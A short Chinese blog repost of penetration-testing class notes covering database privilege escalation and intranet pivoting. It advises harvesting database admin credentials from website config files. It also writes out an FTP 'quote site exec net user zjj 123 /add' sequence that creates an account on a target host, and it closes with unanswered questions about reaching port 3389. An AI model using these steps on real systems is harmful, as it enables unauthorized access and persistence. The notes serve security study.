其他分享
首页 > 其他分享> > 网络安全渗透第9节课笔记

网络安全渗透第9节课笔记

作者:互联网

数据库提权中如何获得数据库的管理员账号和密码?

可以在网站的根目录中找和数据库有关的配置文件.config,一般会有连接数据库的账号和密码。

远程利用目标主机文件执行权限执行命令:

攻击机在cmd命令行输入

ftp

open 192.168.18.11

目标主机密码

quote site exec net user zjj 123 /add

执行成功没有返回结果。

提权后如何渗透内网?

假设目标主机防火墙策略仅开放80端口,攻击者通过80端口在目标主机创建账号,但远程登录端口号是3389,如何实现远程登录?

 

标签:网络安全,80,账号,主机,数据库,笔记,提权,节课,远程
来源: https://www.cnblogs.com/123456ZJJ/p/12930049.html